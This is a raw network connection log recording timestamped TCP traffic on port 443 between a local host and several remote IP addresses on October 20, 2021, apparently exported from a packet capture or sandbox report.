                                                              Oct 20, 2021 15:08:55.949448109 CEST44349834151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:55.949549913 CEST49834443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:55.973376989 CEST49834443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:55.973404884 CEST44349834151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:55.973800898 CEST44349834151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:55.973901033 CEST49834443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:55.981875896 CEST49835443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:55.981910944 CEST44349835151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:55.982319117 CEST44349835151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:55.982461929 CEST49835443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:55.989885092 CEST49836443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:55.989919901 CEST44349836151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:55.990204096 CEST44349836151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:55.990289927 CEST49836443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:55.990353107 CEST49834443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:55.991760969 CEST49835443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:55.992654085 CEST49836443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:56.005919933 CEST44349834151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.005985022 CEST44349834151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.006023884 CEST44349834151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.006036043 CEST49834443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:56.006057024 CEST44349834151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.006068945 CEST49834443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:56.006099939 CEST44349834151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.006113052 CEST49834443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:56.006122112 CEST44349834151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.006144047 CEST49834443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:56.006166935 CEST44349834151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.006170988 CEST49834443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:56.006179094 CEST44349834151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.006212950 CEST49834443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:56.006249905 CEST44349834151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.006252050 CEST49834443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:56.006261110 CEST44349834151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.006293058 CEST49834443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:56.006320000 CEST44349834151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.006331921 CEST49834443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:56.006339073 CEST44349834151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.006382942 CEST49834443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:56.006413937 CEST49834443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:56.006418943 CEST44349834151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.006428957 CEST44349834151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.006477118 CEST49834443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:56.007303953 CEST49832443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:56.007349968 CEST44349832151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.008119106 CEST44349836151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.008183002 CEST44349836151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.008213997 CEST44349836151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.008213997 CEST49836443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:56.008229017 CEST44349836151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.008261919 CEST44349836151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.008266926 CEST49836443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:56.008294106 CEST44349836151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.008325100 CEST44349836151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.008358955 CEST44349836151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.008382082 CEST44349836151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.008393049 CEST49836443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:56.008407116 CEST44349836151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.008452892 CEST49836443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:56.008584023 CEST44349836151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.008661032 CEST44349836151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.008673906 CEST49836443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:56.008718967 CEST49836443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:56.008867025 CEST49833443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:56.008893013 CEST44349833151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.009095907 CEST44349835151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.009159088 CEST44349835151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.009183884 CEST49835443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:56.009201050 CEST44349835151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.009215117 CEST49835443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:56.009248018 CEST44349835151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.009259939 CEST49835443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:56.009270906 CEST44349835151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.009306908 CEST49835443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:56.009311914 CEST44349835151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.009341955 CEST49835443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:56.009352922 CEST44349835151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.009382010 CEST49835443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:56.009396076 CEST44349835151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.009421110 CEST49835443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:56.009432077 CEST44349835151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.009459972 CEST49835443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:56.009488106 CEST49835443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:56.009495020 CEST44349835151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.009546995 CEST49835443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:56.009803057 CEST44349835151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.009880066 CEST44349835151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.009898901 CEST49835443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:56.009908915 CEST44349835151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.009947062 CEST49835443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:56.009984016 CEST49835443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:56.009990931 CEST44349835151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.010051966 CEST49835443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:56.010258913 CEST44349835151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.010318041 CEST49835443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:56.010332108 CEST44349835151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.010380983 CEST49835443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:56.039386988 CEST44349832151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.039511919 CEST49832443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:56.039803982 CEST44349833151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.039894104 CEST49833443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:56.045985937 CEST49837443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:56.046010017 CEST44349837151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.046314955 CEST44349837151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.046385050 CEST49837443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:56.046479940 CEST49837443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:56.061459064 CEST44349837151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.061518908 CEST44349837151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.061578989 CEST44349837151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.062177896 CEST44349837151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.062243938 CEST49837443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:56.062264919 CEST44349837151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.062294006 CEST49837443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:56.062311888 CEST44349837151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.062340975 CEST49837443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:56.062341928 CEST44349837151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.062355042 CEST44349837151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.062376976 CEST49837443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:56.062391996 CEST44349837151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.062403917 CEST49837443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:56.062416077 CEST44349837151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.062436104 CEST49837443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:56.062458992 CEST49837443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:56.063093901 CEST44349837151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.063162088 CEST49837443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:56.063179016 CEST44349837151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.063234091 CEST49837443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:56.063245058 CEST44349837151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.063287020 CEST44349837151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.063292027 CEST49837443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:56.063337088 CEST49837443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:56.129976034 CEST49837443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:56.130014896 CEST44349837151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.149944067 CEST49835443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:56.149986029 CEST44349835151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.180856943 CEST49832443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:56.188726902 CEST49834443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:56.188769102 CEST44349834151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.204873085 CEST49833443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:56.223141909 CEST44349832151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.224271059 CEST49832443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:56.224291086 CEST44349832151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.224591017 CEST49833443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:56.224615097 CEST44349833151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.239300013 CEST44349832151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.239367008 CEST44349832151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.239387989 CEST44349833151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.239399910 CEST44349832151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.239434004 CEST44349832151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.239440918 CEST44349833151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.239469051 CEST44349833151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.239470005 CEST44349832151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.239500046 CEST44349833151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.239506006 CEST44349832151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.239526033 CEST44349833151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.239537001 CEST44349832151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.239536047 CEST49832443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:56.239553928 CEST44349832151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.239588976 CEST44349832151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.239602089 CEST44349833151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.239614964 CEST49832443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:56.239618063 CEST49833443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:56.239674091 CEST49832443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:56.239681959 CEST44349832151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.239706039 CEST49833443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:56.239757061 CEST49832443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:56.239973068 CEST44349832151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.240025997 CEST49832443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:56.240036964 CEST44349832151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.240071058 CEST44349832151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.240081072 CEST49832443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:56.240092993 CEST44349832151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.240111113 CEST49832443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:56.240140915 CEST49832443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:56.240148067 CEST44349832151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.240191936 CEST49832443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:56.240833998 CEST44349832151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.240896940 CEST44349832151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.240919113 CEST49832443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:56.240930080 CEST44349832151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.240937948 CEST49832443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:56.240941048 CEST44349832151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.240993977 CEST49832443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:56.241005898 CEST44349832151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.241019964 CEST44349832151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.241066933 CEST49832443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:56.243360043 CEST49832443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:56.243386030 CEST44349832151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.295588970 CEST49836443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:56.295629978 CEST44349836151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:56.305305958 CEST49833443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:56.305346012 CEST44349833151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:57.210299015 CEST44349820104.26.7.139192.168.2.5
                                                              Oct 20, 2021 15:08:57.210375071 CEST44349820104.26.7.139192.168.2.5
                                                              Oct 20, 2021 15:08:57.210437059 CEST49820443192.168.2.5104.26.7.139
                                                              Oct 20, 2021 15:08:57.210462093 CEST49820443192.168.2.5104.26.7.139
                                                              Oct 20, 2021 15:09:05.431355000 CEST44349826104.26.3.70192.168.2.5
                                                              Oct 20, 2021 15:09:05.431914091 CEST44349826104.26.3.70192.168.2.5
                                                              Oct 20, 2021 15:09:05.431981087 CEST49826443192.168.2.5104.26.3.70
                                                              Oct 20, 2021 15:09:05.432002068 CEST49826443192.168.2.5104.26.3.70
                                                              Oct 20, 2021 15:10:19.228996992 CEST49826443192.168.2.5104.26.3.70
                                                              Oct 20, 2021 15:10:19.229027033 CEST49826443192.168.2.5104.26.3.70
                                                              Oct 20, 2021 15:10:19.229275942 CEST49824443192.168.2.5172.217.168.38
                                                              Oct 20, 2021 15:10:19.229304075 CEST49824443192.168.2.5172.217.168.38
Timestamp                            Src Port  Dst Port  Source IP      Dest IP
Oct 20, 2021 15:10:19.229556084 CEST  49820     443       192.168.2.5    104.26.7.139
Oct 20, 2021 15:10:19.229798079 CEST  49820     443       192.168.2.5    104.26.7.139
Oct 20, 2021 15:10:19.230309010 CEST  49785     443       192.168.2.5    104.20.184.68
Oct 20, 2021 15:10:19.230334997 CEST  49785     443       192.168.2.5    104.20.184.68
Oct 20, 2021 15:12:01.960602999 CEST  49952     443       192.168.2.5    31.220.111.98
Oct 20, 2021 15:12:01.960668087 CEST  443       49952     31.220.111.98  192.168.2.5
Oct 20, 2021 15:12:01.960835934 CEST  49952     443       192.168.2.5    31.220.111.98
Oct 20, 2021 15:12:02.026299953 CEST  49952     443       192.168.2.5    31.220.111.98
Oct 20, 2021 15:12:02.026324034 CEST  443       49952     31.220.111.98  192.168.2.5
Oct 20, 2021 15:12:02.130440950 CEST  49954     443       192.168.2.5    31.220.111.98
Oct 20, 2021 15:12:02.130520105 CEST  443       49954     31.220.111.98  192.168.2.5
Oct 20, 2021 15:12:02.130614996 CEST  49954     443       192.168.2.5    31.220.111.98
Oct 20, 2021 15:12:02.153563023 CEST  49954     443       192.168.2.5    31.220.111.98
Oct 20, 2021 15:12:02.153599024 CEST  443       49954     31.220.111.98  192.168.2.5
Oct 20, 2021 15:12:02.158669949 CEST  443       49952     31.220.111.98  192.168.2.5
Oct 20, 2021 15:12:02.160084009 CEST  49952     443       192.168.2.5    31.220.111.98
Oct 20, 2021 15:12:02.290082932 CEST  443       49954     31.220.111.98  192.168.2.5
Oct 20, 2021 15:12:02.290236950 CEST  49954     443       192.168.2.5    31.220.111.98
Oct 20, 2021 15:12:02.444394112 CEST  49952     443       192.168.2.5    31.220.111.98
Oct 20, 2021 15:12:02.444439888 CEST  443       49952     31.220.111.98  192.168.2.5
Oct 20, 2021 15:12:02.445365906 CEST  443       49952     31.220.111.98  192.168.2.5
Oct 20, 2021 15:12:02.445674896 CEST  49952     443       192.168.2.5    31.220.111.98
Oct 20, 2021 15:12:02.448472977 CEST  49952     443       192.168.2.5    31.220.111.98
Oct 20, 2021 15:12:02.495160103 CEST  443       49952     31.220.111.98  192.168.2.5
Oct 20, 2021 15:12:02.540045977 CEST  49954     443       192.168.2.5    31.220.111.98
Oct 20, 2021 15:12:02.540075064 CEST  443       49954     31.220.111.98  192.168.2.5
Oct 20, 2021 15:12:02.540364027 CEST  443       49954     31.220.111.98  192.168.2.5
Oct 20, 2021 15:12:02.540441990 CEST  49954     443       192.168.2.5    31.220.111.98
Oct 20, 2021 15:12:02.542517900 CEST  49954     443       192.168.2.5    31.220.111.98
Oct 20, 2021 15:12:02.583183050 CEST  443       49954     31.220.111.98  192.168.2.5
Oct 20, 2021 15:12:03.479520082 CEST  443       49952     31.220.111.98  192.168.2.5
Oct 20, 2021 15:12:03.479543924 CEST  443       49952     31.220.111.98  192.168.2.5
Oct 20, 2021 15:12:03.479892015 CEST  49952     443       192.168.2.5    31.220.111.98
Oct 20, 2021 15:12:03.479907990 CEST  443       49952     31.220.111.98  192.168.2.5
Oct 20, 2021 15:12:03.480276108 CEST  49952     443       192.168.2.5    31.220.111.98
Oct 20, 2021 15:12:03.591068029 CEST  443       49954     31.220.111.98  192.168.2.5
Oct 20, 2021 15:12:03.591090918 CEST  443       49954     31.220.111.98  192.168.2.5
Oct 20, 2021 15:12:03.591109037 CEST  443       49954     31.220.111.98  192.168.2.5
Oct 20, 2021 15:12:03.591177940 CEST  49954     443       192.168.2.5    31.220.111.98
Oct 20, 2021 15:12:03.591196060 CEST  443       49954     31.220.111.98  192.168.2.5
Oct 20, 2021 15:12:03.591226101 CEST  49954     443       192.168.2.5    31.220.111.98
Oct 20, 2021 15:12:03.591289043 CEST  49954     443       192.168.2.5    31.220.111.98
Oct 20, 2021 15:12:03.789797068 CEST  443       49952     31.220.111.98  192.168.2.5
Oct 20, 2021 15:12:03.789813995 CEST  443       49952     31.220.111.98  192.168.2.5
Oct 20, 2021 15:12:03.789910078 CEST  443       49952     31.220.111.98  192.168.2.5
Oct 20, 2021 15:12:03.789974928 CEST  49952     443       192.168.2.5    31.220.111.98
Oct 20, 2021 15:12:03.789998055 CEST  443       49952     31.220.111.98  192.168.2.5
Oct 20, 2021 15:12:03.790033102 CEST  49952     443       192.168.2.5    31.220.111.98
Oct 20, 2021 15:12:03.790191889 CEST  49952     443       192.168.2.5    31.220.111.98
Oct 20, 2021 15:12:03.790955067 CEST  443       49952     31.220.111.98  192.168.2.5
Oct 20, 2021 15:12:03.791038036 CEST  443       49952     31.220.111.98  192.168.2.5
Oct 20, 2021 15:12:03.791263103 CEST  49952     443       192.168.2.5    31.220.111.98
Oct 20, 2021 15:12:03.791276932 CEST  443       49952     31.220.111.98  192.168.2.5
Oct 20, 2021 15:12:03.791547060 CEST  49952     443       192.168.2.5    31.220.111.98
Oct 20, 2021 15:12:03.909503937 CEST  443       49954     31.220.111.98  192.168.2.5
Oct 20, 2021 15:12:03.909518957 CEST  443       49954     31.220.111.98  192.168.2.5
Oct 20, 2021 15:12:03.909573078 CEST  443       49954     31.220.111.98  192.168.2.5
Oct 20, 2021 15:12:03.909689903 CEST  49954     443       192.168.2.5    31.220.111.98
Oct 20, 2021 15:12:03.909704924 CEST  443       49954     31.220.111.98  192.168.2.5
Oct 20, 2021 15:12:03.909781933 CEST  49954     443       192.168.2.5    31.220.111.98
Oct 20, 2021 15:12:03.910792112 CEST  443       49954     31.220.111.98  192.168.2.5
Oct 20, 2021 15:12:03.910815001 CEST  443       49954     31.220.111.98  192.168.2.5
Oct 20, 2021 15:12:03.910945892 CEST  49954     443       192.168.2.5    31.220.111.98
Oct 20, 2021 15:12:03.910967112 CEST  443       49954     31.220.111.98  192.168.2.5
Oct 20, 2021 15:12:03.911017895 CEST  49954     443       192.168.2.5    31.220.111.98
Oct 20, 2021 15:12:04.070290089 CEST  443       49952     31.220.111.98  192.168.2.5
Oct 20, 2021 15:12:04.070307970 CEST  443       49952     31.220.111.98  192.168.2.5
Oct 20, 2021 15:12:04.070400953 CEST  443       49952     31.220.111.98  192.168.2.5
Oct 20, 2021 15:12:04.070683002 CEST  49952     443       192.168.2.5    31.220.111.98
Oct 20, 2021 15:12:04.070708990 CEST  443       49952     31.220.111.98  192.168.2.5
Oct 20, 2021 15:12:04.070835114 CEST  49952     443       192.168.2.5    31.220.111.98
Oct 20, 2021 15:12:04.196309090 CEST  443       49954     31.220.111.98  192.168.2.5
Oct 20, 2021 15:12:04.196333885 CEST  443       49954     31.220.111.98  192.168.2.5
Oct 20, 2021 15:12:04.196393013 CEST  443       49954     31.220.111.98  192.168.2.5
Oct 20, 2021 15:12:04.196571112 CEST  49954     443       192.168.2.5    31.220.111.98
Oct 20, 2021 15:12:04.196588993 CEST  443       49954     31.220.111.98  192.168.2.5
Oct 20, 2021 15:12:04.196660042 CEST  49954     443       192.168.2.5    31.220.111.98
Oct 20, 2021 15:12:04.375513077 CEST  443       49952     31.220.111.98  192.168.2.5
Oct 20, 2021 15:12:04.375531912 CEST  443       49952     31.220.111.98  192.168.2.5
Oct 20, 2021 15:12:04.375654936 CEST  443       49952     31.220.111.98  192.168.2.5
Oct 20, 2021 15:12:04.375735998 CEST  49952     443       192.168.2.5    31.220.111.98
Oct 20, 2021 15:12:04.375761986 CEST  443       49952     31.220.111.98  192.168.2.5
Oct 20, 2021 15:12:04.375792980 CEST  49952     443       192.168.2.5    31.220.111.98
Oct 20, 2021 15:12:04.376466036 CEST  49952     443       192.168.2.5    31.220.111.98
Oct 20, 2021 15:12:04.502995968 CEST  443       49954     31.220.111.98  192.168.2.5
Oct 20, 2021 15:12:04.503012896 CEST  443       49954     31.220.111.98  192.168.2.5
Oct 20, 2021 15:12:04.503084898 CEST  443       49954     31.220.111.98  192.168.2.5
Oct 20, 2021 15:12:04.503249884 CEST  49954     443       192.168.2.5    31.220.111.98
Oct 20, 2021 15:12:04.503267050 CEST  443       49954     31.220.111.98  192.168.2.5
Oct 20, 2021 15:12:04.503317118 CEST  49954     443       192.168.2.5    31.220.111.98
Oct 20, 2021 15:12:04.678473949 CEST  443       49952     31.220.111.98  192.168.2.5
Oct 20, 2021 15:12:04.678489923 CEST  443       49952     31.220.111.98  192.168.2.5
Oct 20, 2021 15:12:04.678569078 CEST  443       49952     31.220.111.98  192.168.2.5
Oct 20, 2021 15:12:04.678622007 CEST  49952     443       192.168.2.5    31.220.111.98
Oct 20, 2021 15:12:04.678642988 CEST  443       49952     31.220.111.98  192.168.2.5
Oct 20, 2021 15:12:04.678656101 CEST  49952     443       192.168.2.5    31.220.111.98
Oct 20, 2021 15:12:04.678662062 CEST  443       49952     31.220.111.98  192.168.2.5
Oct 20, 2021 15:12:04.678715944 CEST  49952     443       192.168.2.5    31.220.111.98
Oct 20, 2021 15:12:04.678733110 CEST  49952     443       192.168.2.5    31.220.111.98
Oct 20, 2021 15:12:04.714031935 CEST  443       49952     31.220.111.98  192.168.2.5
Oct 20, 2021 15:12:04.714063883 CEST  443       49952     31.220.111.98  192.168.2.5
Oct 20, 2021 15:12:04.714215994 CEST  49952     443       192.168.2.5    31.220.111.98
Oct 20, 2021 15:12:04.714232922 CEST  443       49952     31.220.111.98  192.168.2.5
Oct 20, 2021 15:12:04.715338945 CEST  49952     443       192.168.2.5    31.220.111.98
Oct 20, 2021 15:12:04.715356112 CEST  49952     443       192.168.2.5    31.220.111.98
Oct 20, 2021 15:12:04.820632935 CEST  443       49954     31.220.111.98  192.168.2.5
Oct 20, 2021 15:12:04.820738077 CEST  443       49954     31.220.111.98  192.168.2.5
Oct 20, 2021 15:12:04.820874929 CEST  443       49954     31.220.111.98  192.168.2.5
Oct 20, 2021 15:12:04.828723907 CEST  49954     443       192.168.2.5    31.220.111.98
Oct 20, 2021 15:12:04.828743935 CEST  443       49954     31.220.111.98  192.168.2.5
Oct 20, 2021 15:12:04.829094887 CEST  49954     443       192.168.2.5    31.220.111.98
Oct 20, 2021 15:12:04.854578972 CEST  443       49954     31.220.111.98  192.168.2.5
Oct 20, 2021 15:12:04.854652882 CEST  443       49954     31.220.111.98  192.168.2.5
Oct 20, 2021 15:12:04.854707003 CEST  49954     443       192.168.2.5    31.220.111.98
Oct 20, 2021 15:12:04.854723930 CEST  443       49954     31.220.111.98  192.168.2.5
Oct 20, 2021 15:12:04.854765892 CEST  49954     443       192.168.2.5    31.220.111.98
Oct 20, 2021 15:12:04.854792118 CEST  49954     443       192.168.2.5    31.220.111.98
Oct 20, 2021 15:12:04.985255957 CEST  443       49952     31.220.111.98  192.168.2.5
Oct 20, 2021 15:12:04.985272884 CEST  443       49952     31.220.111.98  192.168.2.5
Oct 20, 2021 15:12:04.985603094 CEST  49952     443       192.168.2.5    31.220.111.98
Oct 20, 2021 15:12:04.985630989 CEST  443       49952     31.220.111.98  192.168.2.5
Oct 20, 2021 15:12:04.985770941 CEST  443       49952     31.220.111.98  192.168.2.5
Oct 20, 2021 15:12:04.985835075 CEST  49952     443       192.168.2.5    31.220.111.98
Oct 20, 2021 15:12:04.985862970 CEST  49952     443       192.168.2.5    31.220.111.98
Oct 20, 2021 15:12:05.020720959 CEST  443       49952     31.220.111.98  192.168.2.5
Oct 20, 2021 15:12:05.020755053 CEST  443       49952     31.220.111.98  192.168.2.5
Oct 20, 2021 15:12:05.020987034 CEST  49952     443       192.168.2.5    31.220.111.98
Oct 20, 2021 15:12:05.021004915 CEST  443       49952     31.220.111.98  192.168.2.5
